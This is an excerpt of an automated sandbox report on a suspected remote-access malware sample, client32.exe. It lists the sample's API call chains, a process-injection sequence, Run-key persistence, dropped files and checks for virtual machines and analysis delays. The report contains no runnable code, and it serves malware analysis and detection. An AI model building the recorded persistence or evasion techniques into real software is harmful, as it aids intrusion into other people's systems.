                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC97030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,37_2_6CC97030
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC85490 GetPrivateProfileIntA,37_2_6CC85490
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC850E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,37_2_6CC850E0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,37_2_11127E10
                                  Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Support11
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,37_2_11139090
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,37_2_1115B1D0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,37_2_11113290
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,37_2_110CB2B0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,37_2_110254A0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,37_2_110258F0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,37_2_11023BA0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,37_2_11024280
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11112670 IsIconic,GetTickCount,37_2_11112670
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,37_2_111229D0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,37_2_110C0BB0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,37_2_1115ADD0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,37_2_11143570
                                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                  Malware Analysis System Evasion

                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC94F3037_2_6CC94F30
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC891F037_2_6CC891F0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110B8200 Sleep,ExitProcess,37_2_110B8200
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: _memset,LoadLibraryA,GetProcAddress,GetAdaptersInfo,_malloc,GetAdaptersInfo,wsprintfA,_free,FreeLibrary,37_2_6CC97F80
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\osk.exeWindow / User API: threadDelayed 523Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8623Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1254Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1453Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6933Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\jkosfe\vpnclient2.dllJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\rgakat\vpnclient2.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeEvaded block: after key decisiongraph_37-94918
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeEvaded block: after key decisiongraph_37-96517
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeEvaded block: after key decisiongraph_37-99945
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeEvaded block: after key decisiongraph_37-100333
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_37-100077
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_37-99703
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeAPI coverage: 5.7 %
                                  Source: C:\Windows\System32\osk.exe TID: 2980Thread sleep time: -60000s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep count: 8623 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep count: 1254 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 1453 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep count: 6933 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5912Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC93130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6CC93226h37_2_6CC93130
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,37_2_1102D330
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,37_2_11065890
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,37_2_1106A0A0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,37_2_111266E0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,37_2_1110AFD0
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8B7E3438 GetSystemInfo,34_2_00007FFC8B7E3438
                                  Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: VMware
                                  Source: chrome.exe, 00000000.00000002.2431215679.000001E4A75D6000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
                                  Source: explorer.exe, 00000016.00000002.2440811565.0000000008894000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTORVMWare
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor>
